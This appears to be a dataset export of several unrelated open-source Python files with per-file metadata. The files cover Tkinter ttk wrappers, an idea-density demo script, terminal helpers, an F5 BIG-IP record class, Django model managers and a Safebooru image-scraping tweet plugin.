Tkinter.Label): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::label", cnf, kw) ###add LabelFrame class here--KW class LabelFrame(Widget, Tkinter.Label): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::labelframe", cnf, kw) class Menubutton(Widget, Tkinter.Menubutton): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::menubutton", cnf, kw) class Notebook(Widget): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::notebook", cnf, kw) def add(self, child, cnf=(), **kw): """Adds a new tab to the notebook. When the tab is selected, the child window will be displayed. child must be a direct child of the notebook window. See TAB OPTIONS for the list of available options. """ return self.tk.call((self._w, "add", child) + self._options(cnf, kw)) def forget(self, index): """Removes the tab specified by index, unmaps and unmanages the associated child window. """ return self.tk.call(self._w, "forget", index) def index(self, index): """Returns the numeric index of the tab specified by index, or the total number of tabs if index is the string "end". """ return self.tk.call(self._w, "index") def select(self, index): """Selects the specified tab; the associated child pane will be displayed, and the previously-selected pane (if different) is unmapped. """ return self.tk.call(self._w, "select", index) def tab(self, index, **kw): """Query or modify the options of the specific tab. If no -option is specified, returns a dictionary of the tab option values. If one -option is specified, returns the value of tha t option. Otherwise, sets the -options to the corresponding values. See TAB OPTIONS for the available options. """ return self.tk.call((self._w, "tab", index) + self._options(kw)) def tabs(self): """Returns a list of all pane windows managed by the widget.""" return self.tk.call(self._w, "tabs") class Paned(Widget): """ WIDGET OPTIONS Name Database name Database class -orient orient Orient Specifies the orientation of the window. If vertical, subpanes are stacked top-to-bottom; if horizontal, subpanes are stacked left-to-right. PANE OPTIONS The following options may be specified for each pane: Name Database name Database class -weight weight Weight An integer specifying the relative stretchability of the pane. When the paned window is resized, the extra space is added or subracted to each pane proportionally to its -weight """ def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::panedwindow", cnf, kw) def add(self, subwindow, **kw): """Adds a new pane to the window. subwindow must be a direct child of the paned window pathname. See PANE OPTIONS for the list of available options. """ return self.tk.call((self._w, "add", subwindow) + self._options(kw)) def forget(self, pane): """Removes the specified subpane from the widget. pane is either an integer index or the name of a managed subwindow. """ self.tk.call(self._w, "forget", pane) def insert(self, pos, subwindow, **kw): """Inserts a pane at the specified position. pos is either the string end, an integer index, or the name of a managed subwindow. If subwindow is already managed by the paned window, moves it to the specified position. See PANE OPTIONS for the list of available options. """ return self.tk.call((self._w, "insert", pos, subwindow) + self._options(kw)) def pane(self, pane, **kw): """Query or modify the options of the specified pane, where pane is either an integer index or the name of a managed subwindow. If no -option is specified, returns a dictionary of the pane option values. If one -option is specified, returns the value of that option. Otherwise, sets the -options to the corresponding values. """ return self.tk.call((self._w, "pane", pane) + self._options(kw)) class Progressbar(Widget): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::progressbar", cnf, kw) def step(self, amount=1.0): """Increments the -value by amount. amount defaults to 1.0 if omitted. """ return self.tk.call(self._w, "step", amount) def start(self): self.tk.call("ttk::progressbar::start", self._w) def stop(self): self.tk.call("ttk::progressbar::stop", self._w) class Radiobutton(Widget, Tkinter.Radiobutton): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::radiobutton", cnf, kw) class Scrollbar(Widget, Tkinter.Scrollbar): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::scrollbar", cnf, kw) class Separator(Widget): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::separator", cnf, kw) class Treeview(Widget, Tkinter.Listbox): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, 'ttk::treeview', cnf, kw) def children(self, item, newchildren=None): """If newchildren is not specified, returns the list of children belonging to item. If newchildren is specified, replaces item's child list with newchildren. Items in the old child list not present in the new child list are detached from the tree. None of the items in newchildren may be an ancestor of item. """ return self.tk.call(self._w, "children", item, newchildren) def column(self, column, **kw): """Query or modify the options for the specified column. If no options are specified, returns a dictionary of option/value pairs. If a single option is specified, returns the value of that option. Otherwise, the options are updated with the specified values. The following options may be set on each column: -id name The column name. This is a read-only option. For example, [$pathname column #n -id] returns the data column associated with data column #n. -anchor Specifies how the text in this column should be aligned with respect to the cell. One of n, ne, e, se, s, sw, w, nw, or center. -width w The width of the column in pixels. Default is something reasonable, probably 200 or so. """ pass def delete(self, items): """Deletes each of the items and all of their descendants. The root item may not be deleted. See also: detach. """ return self.tk.call(self._w, "delete", items) def detach(self, items): """Unlinks all of the specified items from the tree. The items and all of their descendants are still present and may be reinserted at another point in the tree but will not be displayed. The root item may not be detached. See also: delete. """ return self.tk.call(self._w, "detach", items) def exists(self, item): """Returns 1 if the specified item is present in the tree, 0 otherwise. """ return self.tk.call(self._w, "exists", item) def focus(self, item=None): """If item is specified, sets the focus item to item. Otherwise, returns the current focus item, or {} if there is none. """ return self.tk.call(self._w, "focus", item) def heading(self, column, **kw): """Query or modify the heading options for the specified column. Valid options are: -text text The text to display in the column heading. -image imageName Specifies an image to display to the right of the column heading. -command script A script to evaluate when the heading label is pressed. """ pass def identify(self, x, y): """Returns a description of the widget component under the point given by x and y. The return value is a list with one of the following forms: heading #n The column heading for display column #n. separator #n The border to the right of display column #n. cell itemid #n The data value for item itemid in display column #n. item itemid element The tree label for item itemid; element is one of text, image, or indicator, or another element name depending on the style. row itemid The y position is over the item but x does not identify any element or displayed data value. nothing The coordinates are not over any identifiable object. See COLUMN IDENTIFIERS for a discussion of display columns and data columns. """ pass def index(self, item): """Returns the integer index of item within its parent's list of children. """ pass def insert(self, parent, index, id=None, **kw): """Creates a new item. parent is the item ID of the parent item, or the empty string {} to create a new top-level item. index is an integer, or the value end, specifying where in the list of parent's children to insert the new item. If index is less than or equal to zero, the new node is inserted at the beginning; if index is greater than or equal to the current number of children, it is inserted at the end. If -id is specified, it is used as the item identifier; id must not already exist in the tree. Otherwise, a new unique identifier is generated. returns the item identifier of the newly created item. See ITEM OPTIONS for the list of available options. """ pass def item(item, **kw): """Query or modify the options for the specified item. If no -option is specified, returns a dictionary of option/value pairs. If a single -option is specified, returns the value of that option. Otherwise, the item's options are updated with the specified values. See ITEM OPTIONS for the list of available options. """ pass def move(self, item, parent, index): """Moves item to position index in parent's list of children. It is illegal to move an item under one of its descendants. If index is less than or equal to zero, item is moved to the beginning; if greater than or equal to the number of children, it's moved to the end. """ pass def next(self, item): """Returns the identifier of item's next sibling, or {} if item is the last child of its parent. """ pass def parent(self, item): """Returns the ID of the parent of item, or {} if item is at the top level of the hierarchy. """ pass def prev(self, item): """Returns the identifier of item's previous sibling, or {} if item is the first child of its parent. """ pass def selection(self): """Returns the list of selected items""" pass def selection_set(self, items): """items becomes the new selection. """ pass def selection_add(self, items): """Add items to the selection """ pass def selection_remove(self, items): """Remove items from the selection """ pass def selection_toggle(self, items): """Toggle the selection state of each item in items. """ pass def set(self, item, column, value=None): """If value is specified, sets the value of column column in item item, otherwise returns the current value. See COLUMN IDENTIFIERS. """ pass else: print "GUI: tcl/tk version is older than 8.5; using simple back-up widgets." # In the future, could add more fake tile widgets (or handle more methods of # existing ones) if required. class FakeCombobox(Tkinter.OptionMenu): def __init__(self, master=None, textvariable=None,values=None,state=None,**kw): # missing state=readonly # missing current() Tkinter.OptionMenu.__init__(self,master,textvariable,*values) Combobox = FakeCombobox class FakeProgressbar(Tkinter.Frame): def __init__(self,master=None,cnf={},**kw): Tkinter.Frame.__init__(self,master) def step(self,amount=1.0): pass def start(self): pass def stop(self): pass Progressbar = FakeProgressbar # CB: tix has Notebook, Combobox, and Meter, but I wouldn't # want to rely on Tix being present (even though it is # supposed to be part of Python's standard library).
bsd-3-clause
419,085,562,894,774,600
34.977368
93
0.506839
false
4.092743
false
false
false
andrecunha/idd3
examine.py
1
2041
# -*- coding: utf-8 -*- # IDD3 - Propositional Idea Density from Dependency Trees # Copyright (C) 2014-2015 Andre Luiz Verucci da Cunha # # This program is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the Free # Software Foundation, either version 3 of the License, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or # FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for # more details. # # You should have received a copy of the GNU General Public License along with # this program. If not, see <http://www.gnu.org/licenses/>. from __future__ import print_function, unicode_literals, division import pprint import idd3 from idd3 import Relation, Engine from idd3.rules import en import nltk from sys import argv import logging logging.basicConfig(level=logging.DEBUG) try: from termcolor import colored except ImportError: def colored(string, color, attrs): return string def demo(): idd3.use_language(en) graphs = nltk.parse.dependencygraph.DependencyGraph.load(argv[1]) index = int(argv[2]) - 1 engine = Engine(idd3.all_rulesets, idd3.all_transformations) relations = [] for relation in graphs[index].nodelist: relations.append(Relation(**relation)) print(colored('Sentence %d:' % (index + 1), 'white', attrs=['bold'])) pprint.pprint(relations) print(colored('Propositions:', 'white', attrs=['bold'])) engine.analyze(relations) for i, prop in enumerate(engine.props): print(str(i + 1) + ' ' + str(prop)) print(colored('Unprocessed relations:', 'white', attrs=['bold'])) for relation in engine.get_unprocessed_relations(relations): print(relation) if __name__ == '__main__': if len(argv) != 3: print('Usage: python', argv[0], '<conll file>', '<index>') else: demo()
gpl-3.0
3,371,991,498,734,300,700
30.890625
78
0.696227
false
3.751838
false
false
false
JMSwag/jms-utils
jms_utils/terminal.py
1
8327
# -------------------------------------------------------------------------- # The MIT License (MIT) # # Copyright (c) 2014-2016 Digital Sapphire # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # -------------------------------------------------------------------------- from __future__ import print_function import logging try: import msvcrt except ImportError: msvcrt = None import locale import optparse import os import platform import shlex import struct import subprocess import sys try: import termios except ImportError: termios = None try: import tty except ImportError: tty = None import six log = logging.getLogger(__name__) def print_to_console(text): enc = locale.getdefaultlocale()[1] or "utf-8" try: print(text.encode(enc, errors="backslashreplace")) except (LookupError, UnicodeEncodeError): # Unknown encoding or encoding problem. Fallback to ascii print(text.encode("ascii", errors="backslashreplace")) def terminal_formatter(): max_width = 80 max_help_position = 80 # No need to wrap help messages if we're on a wide console columns = get_terminal_size()[0] if columns: max_width = columns fmt = optparse.IndentedHelpFormatter(width=max_width, max_help_position=max_help_position) return fmt # get width and height of console # works on linux, os x, windows, cygwin(windows) # originally retrieved from: # http://stackoverflow.com/questions/ # 566746/how-to-get-console-window-width-in-python def get_terminal_size(): current_os = platform.system() tuple_xy = None if current_os == u'Windows': tuple_xy = _get_terminal_size_windows() if tuple_xy is None: tuple_xy = _get_terminal_size_tput() # needed for window's python in cygwin's xterm! if current_os in [u'Linux', u'Darwin'] or current_os.startswith('CYGWIN'): tuple_xy = _get_terminal_size_linux() if tuple_xy is None: log.debug(u"default") tuple_xy = (80, 25) # default value return tuple_xy def _get_terminal_size_windows(): try: from ctypes import windll, create_string_buffer # stdin handle is -10 # stdout handle is -11 # stderr handle is -12 h = windll.kernel32.GetStdHandle(-12) csbi = create_string_buffer(22) res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi) if res: (bufx, bufy, curx, cury, wattr, left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw) sizex = right - left + 1 sizey = bottom - top + 1 return sizex, sizey except: pass def _get_terminal_size_tput(): # get terminal width # http://stackoverflow.com/questions/263890/ # how-do-i-find-the-width-height-of-a-terminal-window try: cols = int(subprocess.check_call(shlex.split('tput cols'))) rows = int(subprocess.check_call(shlex.split('tput lines'))) return (cols, rows) except: pass def _get_terminal_size_linux(): def ioctl_GWINSZ(fd): try: import fcntl # Is this required # import termios cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234')) return cr except: pass cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2) if not cr: try: fd = os.open(os.ctermid(), os.O_RDONLY) cr = ioctl_GWINSZ(fd) os.close(fd) except: pass if not cr: try: cr = (os.environ['LINES'], os.environ['COLUMNS']) except: return None return int(cr[1]), int(cr[0]) # Gets a single character form standard input. Does not echo to the screen class GetCh: def __init__(self): if sys.platform == u'win32': self.impl = _GetchWindows() else: self.impl = _GetchUnix() def __call__(self): return self.impl() class _GetchUnix: def __init__(self): pass def __call__(self): pass fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) ch = sys.stdin.read(1) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch class _GetchWindows: def __init__(self): pass def __call__(self): return msvcrt.getch() def ask_yes_no(question, default='no', answer=None): u"""Will ask a question and keeps prompting until answered. Args: question (str): Question to ask end user default (str): Default answer if user just press enter at prompt answer (str): Used for testing Returns: (bool) Meaning: True - Answer is yes False - Answer is no """ default = default.lower() yes = [u'yes', u'ye', u'y'] no = [u'no', u'n'] if default in no: help_ = u'[N/y]?' default = False else: default = True help_ = u'[Y/n]?' while 1: display = question + '\n' + help_ if answer is None: log.debug(u'Under None') answer = six.moves.input(display) answer = answer.lower() if answer == u'': log.debug(u'Under blank') return default if answer in yes: log.debug(u'Must be true') return True elif answer in no: log.debug(u'Must be false') return False else: sys.stdout.write(u'Please answer yes or no only!\n\n') sys.stdout.flush() answer = None six.moves.input(u'Press enter to continue') sys.stdout.write('\n\n\n\n\n') sys.stdout.flush() def get_correct_answer(question, default=None, required=False, answer=None, is_answer_correct=None): u"""Ask user a question and confirm answer Args: question (str): Question to ask user default (str): Default answer if no input from user required (str): Require user to input answer answer (str): Used for testing is_answer_correct (str): Used for testing """ while 1: if default is None: msg = u' - No Default Available' else: msg = (u'\n[DEFAULT] -> {}\nPress Enter To ' u'Use Default'.format(default)) prompt = question + msg + u'\n--> ' if answer is None: answer = six.moves.input(prompt) if answer == '' and required and default is not None: print(u'You have to enter a value\n\n') six.moves.input(u'Press enter to continue') print(u'\n\n') answer = None continue if answer == u'' and default is not None: answer = default _ans = ask_yes_no(u'You entered {}, is this ' u'correct?'.format(answer), answer=is_answer_correct) if _ans: return answer else: answer = None
mit
-2,106,631,287,010,268,000
28.217544
79
0.578119
false
3.9976
false
false
false
f5devcentral/f5-cccl
f5_cccl/resource/net/fdb/record.py
1
1541
"""Provides a class for managing BIG-IP FDB tunnel record resources.""" # coding=utf-8 # # Copyright (c) 2017-2021 F5 Networks, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import logging from f5_cccl.resource import Resource from f5_cccl.utils.route_domain import normalize_address_with_route_domain LOGGER = logging.getLogger(__name__) class Record(Resource): """Record class for managing network configuration on BIG-IP.""" properties = dict(name=None, endpoint=None) def __init__(self, name, default_route_domain, **data): """Create a record from CCCL recordType.""" super(Record, self).__init__(name, partition=None) endpoint = data.get('endpoint', None) self._data['endpoint'] = normalize_address_with_route_domain( endpoint, default_route_domain)[0] def __eq__(self, other): if not isinstance(other, Record): return False return super(Record, self).__eq__(other) def _uri_path(self, bigip): raise NotImplementedError
apache-2.0
8,939,869,457,900,549,000
32.5
74
0.69695
false
3.992228
false
false
false
emilkjer/django-model-utils
model_utils/managers.py
1
8414
from types import ClassType import warnings from django.contrib.contenttypes.models import ContentType from django.db import models from django.db.models.fields.related import OneToOneField from django.db.models.manager import Manager from django.db.models.query import QuerySet import django class InheritanceQuerySet(QuerySet): def select_subclasses(self, *subclasses): if not subclasses: subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects() if isinstance(rel.field, OneToOneField) and issubclass(rel.field.model, self.model)] new_qs = self.select_related(*subclasses) new_qs.subclasses = subclasses return new_qs def _clone(self, klass=None, setup=False, **kwargs): for name in ['subclasses', '_annotated']: if hasattr(self, name): kwargs[name] = getattr(self, name) return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs) def annotate(self, *args, **kwargs): qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs) qset._annotated = [a.default_alias for a in args] + kwargs.keys() return qset def get_subclass(self, obj): """ FIX see https://bitbucket.org/carljm/django-model-utils/pull-request/5/patch-to-issue-16/diff and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses """ def get_attribute(obj, s): try: return getattr(obj,s, False) except obj.__class__.DoesNotExist: return False if django.VERSION[0:2] < (1, 5): sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj] else: sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj] return sub_obj[0] def iterator(self): iter = super(InheritanceQuerySet, self).iterator() if getattr(self, 'subclasses', False): for obj in iter: sub_obj = self.get_subclass(obj) if getattr(self, '_annotated', False): for k in self._annotated: setattr(sub_obj, k, getattr(obj, k)) yield sub_obj else: for obj in iter: yield obj class InheritanceManager(models.Manager): use_for_related_fields = True def get_query_set(self): return InheritanceQuerySet(self.model) def select_subclasses(self, *subclasses): return self.get_query_set().select_subclasses(*subclasses) def get_subclass(self, *args, **kwargs): return self.get_query_set().select_subclasses().get(*args, **kwargs) class InheritanceCastMixin(object): def cast(self): results = tuple(self.values_list('pk', 'real_type')) type_to_pks = {} for pk, real_type_id in results: type_to_pks.setdefault(real_type_id, []).append(pk) content_types = ContentType.objects.in_bulk(type_to_pks.keys()) pk_to_child = {} for real_type_id, pks in type_to_pks.iteritems(): content_type = content_types[real_type_id] child_type = content_type.model_class() children = child_type._default_manager.in_bulk(pks) for pk, child in children.iteritems(): pk_to_child[pk] = child children = [] # sort children into same order as parents where returned for pk, real_type_id in results: children.append(pk_to_child[pk]) return children class QueryManager(models.Manager): def __init__(self, *args, **kwargs): if args: self._q = args[0] else: self._q = models.Q(**kwargs) super(QueryManager, self).__init__() def order_by(self, *args): self._order_by = args return self def get_query_set(self): qs = super(QueryManager, self).get_query_set().filter(self._q) if hasattr(self, '_order_by'): return qs.order_by(*self._order_by) return qs class PassThroughManager(models.Manager): """ Inherit from this Manager to enable you to call any methods from your custom QuerySet class from your manager. Simply define your QuerySet class, and return an instance of it from your manager's `get_query_set` method. Alternately, if you don't need any extra methods on your manager that aren't on your QuerySet, then just pass your QuerySet class to the ``for_queryset_class`` class method. class PostQuerySet(QuerySet): def enabled(self): return self.filter(disabled=False) class Post(models.Model): objects = PassThroughManager.for_queryset_class(PostQuerySet)() """ # pickling causes recursion errors _deny_methods = ['__getstate__', '__setstate__', '_db'] def __init__(self, queryset_cls=None): self._queryset_cls = queryset_cls super(PassThroughManager, self).__init__() def __getattr__(self, name): if name in self._deny_methods: raise AttributeError(name) return getattr(self.get_query_set(), name) def get_query_set(self): if self._queryset_cls is not None: kargs = {'model': self.model} if hasattr(self, '_db'): kargs['using'] = self._db return self._queryset_cls(**kargs) return super(PassThroughManager, self).get_query_set() @classmethod def for_queryset_class(cls, queryset_cls): class _PassThroughManager(cls): def __init__(self): return super(_PassThroughManager, self).__init__() def get_query_set(self): kwargs = {} if hasattr(self, "_db"): kwargs["using"] = self._db return queryset_cls(self.model, **kwargs) return _PassThroughManager def manager_from(*mixins, **kwds): """ Returns a Manager instance with extra methods, also available and chainable on generated querysets. (By George Sakkis, originally posted at http://djangosnippets.org/snippets/2117/) :param mixins: Each ``mixin`` can be either a class or a function. The generated manager and associated queryset subclasses extend the mixin classes and include the mixin functions (as methods). :keyword queryset_cls: The base queryset class to extend from (``django.db.models.query.QuerySet`` by default). :keyword manager_cls: The base manager class to extend from (``django.db.models.manager.Manager`` by default). """ warnings.warn( "manager_from is pending deprecation; use PassThroughManager instead.", PendingDeprecationWarning, stacklevel=2) # collect separately the mixin classes and methods bases = [kwds.get('queryset_cls', QuerySet)] methods = {} for mixin in mixins: if isinstance(mixin, (ClassType, type)): bases.append(mixin) else: try: methods[mixin.__name__] = mixin except AttributeError: raise TypeError('Mixin must be class or function, not %s' % mixin.__class__) # create the QuerySet subclass id = hash(mixins + tuple(kwds.iteritems())) new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods) # create the Manager subclass bases[0] = manager_cls = kwds.get('manager_cls', Manager) new_manager_cls = type('Manager_%d' % id, tuple(bases), methods) # and finally override new manager's get_query_set super_get_query_set = manager_cls.get_query_set def get_query_set(self): # first honor the super manager's get_query_set qs = super_get_query_set(self) # and then try to bless the returned queryset by reassigning it to the # newly created Queryset class, though this may not be feasible if not issubclass(new_queryset_cls, qs.__class__): raise TypeError('QuerySet subclass conflict: cannot determine a ' 'unique class for queryset instance') qs.__class__ = new_queryset_cls return qs new_manager_cls.get_query_set = get_query_set return new_manager_cls()
bsd-3-clause
8,724,807,216,674,744,000
36.395556
103
0.611719
false
4.114425
false
false
false
ace3df/ImageTweet
plugins/safebooru.py
1
9578
# -*- coding: utf-8 -*- import random import time import sys import os import re sys.path.append( os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))) import utils def delete_image(image): import time time.sleep(10) os.remove(image) def tag_clean(tag_html): text = tag_html.text text = text.rstrip('1234567890.') text = text.replace("&#39;", "\'").strip() return text def get_image_online(**kwargs): if kwargs.get('used images'): txt_name = kwargs.get('used images') used_links = open(txt_name, 'r').read().splitlines() else: txt_name = os.path.join(os.getcwd(), "Used safebooru {0}.txt".format( kwargs['bot name'])) try: used_links = open(txt_name, 'r').read().splitlines() except: if not os.path.exists(txt_name): print("Didn't find any used links! Creating a TXT!") print("Set it to:\n{0}".format(txt_name)) used_links = [] else: used_links = open(txt_name, 'r').read().splitlines() if kwargs.get('highest page'): high_page = int(kwargs.get('highest page')) else: high_page = 50 tried_pages = [high_page] cookie_file = None try_count = 0 low_page = 0 page = 0 x = None no_images = False url_start = "http://safebooru.org" url_search = "http://safebooru.org/index.php?page=post&s=list&tags=" if utils.is_bool(kwargs.get('login')): cookie_file = "../safebooru.txt" url_login = url_start + "/index.php?page=account&s=login&code=00" form_num = 0 form_user = "user" form_password = "pass" username = kwargs.get('username') password = kwargs.get('password') if not os.path.exists(cookie_file): browser, s = utils.scrape_site(url_login, cookie_file, True) form = browser.get_form(form_num) form[form_user].value = username form[form_password].value = password browser.submit_form(form) s.cookies.save() if utils.is_bool(kwargs.get('save images')): if kwargs.get('path'): path = kwargs.get('path') else: path = os.path.abspath(os.path.join(os.getcwd(), "images")) if not os.path.exists(path): os.makedirs(path) else: path = os.path.abspath(os.path.join(os.getcwd())) if kwargs.get('tags'): if isinstance(kwargs.get('tags'), list): tags = '+'.join(kwargs.get('tags')) else: tags = '+'.join(kwargs.get('tags').split(', ')) else: tags = "" if kwargs.get('ignore tags'): if isinstance(kwargs.get('ignore tags'), list): ignore_tags = kwargs.get('ignore tags') else: ignore_tags = kwargs.get('ignore tags').split(', ') else: ignore_tags = [] if utils.is_bool(kwargs.get('ignore cosplay')): ignore_cosplay = utils.is_bool(kwargs.get('ignore cosplay')) else: ignore_cosplay = False if utils.is_bool(kwargs.get('accept webm')): accept_webm = utils.is_bool(kwargs.get('accept webm')) else: accept_webm = False tried_pages = [high_page + 41] while True: while True: while True: while True: no_images = False try_count += 1 if try_count == 15: return False, False page = str(int(random.randint(low_page, high_page) * 40)) while int(page) in tried_pages: if int(page) == 0: break if not x: x = high_page page = str(int( random.randint(low_page, high_page) * 1)) if int(page) > int(x): continue tried_pages.append(int(page)) x = min(tried_pages) page_url = "&pid=" + str(page) url = "%s%s%s" % (url_search, tags, page_url) browser = utils.scrape_site(url, cookie_file) if browser.find('h1', text="Nothing found, try google? "): no_images = True elif len(browser.find_all('img')) < 3: no_images = True time.sleep(1) if not no_images: break elif no_images and int(page) == 0: return False, False good_image_links = [] image_links = browser.find_all('span', class_="thumb") for link in image_links: try: link['id'] except: continue link = str(link['id'])[1:] good_image_links.append(link) if good_image_links == []: return False, False random.shuffle(good_image_links) url = "%s/index.php?page=post&s=view&id=%s" % ( url_start, random.choice(good_image_links)) try_count = 0 while url in used_links: url = "%s/index.php?page=post&s=view&id=%s" % ( url_start, random.choice(good_image_links)) try_count = try_count + 1 if try_count == 20: break used_links.append(url) post_url = url browser.open(url) image_tags = [] char_tags = [] art_tags = [] sers_tags = [] tags_tags = [] site_tag = browser.find('ul', id="tag-sidebar") site_tag = site_tag.find_all('li') for taga in site_tag: tag = tag_clean(taga) if taga['class'][0] == "tag-type-artist": art_tags.append(tag.title()) elif taga['class'][0] == "tag-type-copyright": sers_tags.append(tag.title()) elif taga['class'][0] == "tag-type-character": char_tags.append(tag.title()) else: tags_tags.append(tag.title()) image_tags.append(tag.lower()) if any([item in [x.lower() for x in ignore_tags] for item in [x.lower() for x in image_tags]]): continue if ignore_cosplay: if any(" (cosplay)" in s for s in image_tags): continue break filename = "" if not utils.is_bool(kwargs.get('message')): message = "" try: url = browser.find( 'img', attrs={'id': 'image'})['src'].replace("\\\\", "\\") except: # Flash file continue sn_kwgs = {} sn_url, sn_kwgs = utils.saucenao(url, kwargs['saucenao api'], True) re_dict = {'{#artist}': ( '#' if art_tags else '') + ' #'.join( [x.replace(" ", "_") for x in art_tags]), '{#character}': ( '#' if char_tags else '') + ' #'.join( [x.replace(" ", "_") for x in char_tags]), '{#series}': ( '#' if sers_tags else '') + ' #'.join( [x.replace(" ", "_") for x in sers_tags]), '{#tags}': ( '#' if tags_tags else '') + ' #'.join( [x.replace(" ", "_") for x in tags_tags]), '{artist}': ', '.join(art_tags), '{character}': ', '.join(char_tags), '{series}': ', '.join(sers_tags), '{tags}': ', '.join(tags_tags), '{url}': post_url, '{sn title}': sn_kwgs.get('title'), '{sn illust id}': sn_kwgs.get('illust id'), '{sn illust url}': sn_url, '{sn artist}': sn_kwgs.get('artist'), '{sn artist id}': sn_kwgs.get('artist id'), '{sn artist url}': sn_kwgs.get('artist url')} if kwargs.get('filename'): filename = utils.replace_all(kwargs.get('filename'), re_dict) filename = utils.safe_msg(filename) if kwargs.get('message'): message = utils.replace_all(kwargs.get('message'), re_dict) message = utils.safe_msg(message) with open(txt_name, 'w') as f: f.write("\n".join(used_links)) tweet_image = utils.download_image(url, path, filename, **kwargs) if tweet_image: break if not utils.is_bool(kwargs.get('save images')): from threading import Thread Thread(name="Delete Image", target=delete_image, args=( tweet_image, )).start() return message, tweet_image def main(**kwargs): message, image = get_image_online(**kwargs) return(message, image)
mit
392,481,504,197,402,100
37.934959
79
0.448423
false
4.12667
false
false
false